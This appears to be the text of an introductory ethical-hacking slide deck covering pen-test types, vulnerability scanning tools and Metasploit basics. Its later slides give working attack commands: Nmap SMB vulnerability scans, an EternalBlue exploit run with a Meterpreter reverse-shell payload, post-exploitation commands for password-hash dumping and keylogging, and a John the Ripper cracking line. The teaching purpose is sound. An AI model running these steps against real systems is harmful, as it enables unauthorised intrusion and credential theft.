Introduction To Ethical Hacking

2. What is Hacking ?
 Process to bypass the security mechanisms.
 Unauthorized use of computer and network.
 Hacking is the practice of modifying the features of a
system, in order to accomplish a goal outside of the
creator's original purpose.
 Hacking is the process of exploiting vulnerabilities to
gain unauthorized access to systems or resources.

3. Who are hackers ?
 Hacker is a term used by some to mean "a clever
programmer" and by others, especially those in
popular media, to mean "someone who tries to break
into computer systems."

4. Types of Hackers
 White Hat
 IT professional
 Administrators
 Black Hat
 Crackers
 Grey Hat

5. Understanding the need to hack
your own system
 Basis for Ethical Hacking.
 To catch a thief, think like a thief

6. Overall goals of an ethical hacker
 Hack your systems in a nondestructive fashion.
 Enumerate vulnerabilities and , if necessary, prove
to management that vulnerabilities exit and can be
exploited.
 Apply result to remove the vulnerabilities and
better secure your systems.

7. Vulnerability Assessment
 A vulnerability assessment is the process of defining,
identifying, classifying and prioritizing vulnerabilities
in computer systems, applications and network
infrastructures and providing the organization doing
the assessment with the necessary knowledge,
awareness and risk background to understand the
threats to its environment and react appropriately.

8. Vulnerability Assessment Tools
 Nexpose Community
 QualysGuard
 OpenVAS
 Nikto
 Nmap
 Nessus Professional
 Acunetix
 Netsparker
 IBM AppScan
 Burp Suite

9. What is Penetration Testing
 A penetration test, also known as a pen test, is a
simulated cyber attack against your network,
infrastructure, devices, computer system or any other
environment to check for exploitable vulnerabilities.

10. Types of Penetration Tests
 Black Box Penetration Testing
 White Box Penetration Testing
 Grey Box Penetration Testing

11. Black Box Penetration Testing
 In black box penetration testing, tester has no idea
about the systems that he is going to test. He is
interested to gather information about the target
network or system. For example, in this testing, a
tester only knows what should be the expected
outcome and he does not know how the outcomes
arrives. He does not examine any programming codes.

12. White Box Penetration Testing
 This is a comprehensive testing, as tester has been
provided with whole range of information about the
systems and/or network such as Schema, Source code,
OS details, IP address, etc. It is normally considered as
a simulation of an attack by an internal source. It is
also known as structural, glass box, clear box, and open
box testing.
 White box penetration testing examines the code
coverage and does data flow testing, path testing, loop
testing, etc.

13. Grey Box Penetration Testing
 In this type of testing, a tester usually provides partial
or limited information about the internal details of the
program of a system. It can be considered as an attack
by an external hacker who had gained illegitimate
access to an organization's network infrastructure
documents.

14. Penetration Testing Stages

15. Top 10 Common Vulnerabilities
 SQL Injection
 Cross Site Scripting
 Broken Authentication and Session Management
 Insecure Direct Object References
 Cross Site Request Forgery
 Security Misconfiguration
 Insecure Cryptographic Storage
 Failure to restrict URL Access
 Insufficient Transport Layer Protection
 Un-validated Redirects and Forwards

16. Demo Website and VMs
 https://demo.testfire.net
 http://testphp.vulnweb.com
 OWASP Mutillidae II
 Attack-defense online lab

18. Building Hacking Environment
 Kali Linux - http://www.kali.org/downloads/

19. Kali Linux

20. Ports Scanning With NMAP
 nmap –sS -T4 –v <target>

21. Foot-printing Services With NMAP
 nmap –sS –sV -T4 –v <target>

22. Vulnerability Scanning With NMAP
 nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-
025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-
ms17-010 192.168.10.135

23. Web Vulnerability Scanning
 OWASP ZAP – zaproxy

24. Starting with Metasploit !!!
 The Metasploit project is an open-source, computer
security project which provides information about
security vulnerabilities and aids in penetration testing
and IDS signature development.
 Metasploit is an framework which is used for the
hacking of different kinds of applications, operating
systems, web applications etc.

25. What is metasploit ?
 Metasploit contain various exploits, payloads, modules
etc.
 Metasploit Framework is especially used by many of
the hackers to generate payloads and attack the
systems.
 As Metasploit is an open source where any one can use
it. This framework supports different operating
systems like windows, linux ,mac os x etc.

26. Metasploit terms
 Exploit  used to take advantage of a security flaw
within a system, network, or application.
 Payload  is code that our victim computer to
execute by the Metasploit framework.
 Module  a small piece of code that can be added to
the Metasploit framework to execute an attack.
 Shell-code  a small piece of code used as a payload.

27. What is a vulnerability?
 A vulnerability is a security hole in a piece of software,
hardware or operating system that provides a potential
angle to attack the system.
 A vulnerability can be as simple as weak passwords or
as complex as buffer overflows or SQL injection
vulnerabilities.

28. What is an exploit?
 To take advantage of a vulnerability, you often need an
exploit, a small and highly specialized computer
program whose only reason of being is to take
advantage of a specific vulnerability and to provide
access to a computer system.
 Exploits often deliver a payload to the target system to
grant the attacker access to the system.

29. What is a payload?
 A payload is the piece of software that lets you control
a computer system after it’s been exploited.
 The payload is typically attached to and delivered by
the exploit.
 Metasploit most popular payload is called Meterpreter,
which enables you to do all sorts of funky stuff on the
target system. For example, you can upload and
download files from the system, take screenshots, and
collect password hashes etc.

30. What is msfconsole ?
 MSFconsole is an all-in-one interface to most of the
features in Metasploit.
 MSFconsole can be used to launch attacks, creating
listeners, and much, much more.
 Commands :
 Show exploits
 Show payloads
 Show options
 Use exploit

31. Commands
 set payload
 Set LHOST
 Set RHOST
 Back
 Info
 Session
 Session –l
 Session –i 1

32. Meterpreter commands
 Getuid -> show uid
 Ps -> show active process
 Migrate -> command used when hacker want to
migrate his process to any administrative privileges
process.
 Hashdump -> to dump password hash.
 Screenshot -> to take screenshot of victim.
 Shell -> to enter into the victim shell.
 download C:<file name>
 upload C:<file name>

33. More Meterpreter commands
 keyscan_start -> start sniffing key strokes.
 keyscan_dump
 keyscan_stop
 uictl disable keyboard
 uictl enable keyboard

34. Demonstration - Service Exploitation

35. Reconnaissance
 Ports and service scan of target system
>> nmap -sS -p445 -sV -v <victim_IP>

36. Exploitation – ms17_010_eternalblue
>> msfconsole
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf > set payload windows/x64/meterpreter/reverse_tcp

37. msf5 > show options
msf5 > set RHOST <victim_IP>
Exploitation – ms17_010_eternalblue

38. Exploitation – ms17_010_eternalblue

40. Windows Password Cracking
 John the ripper
 Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt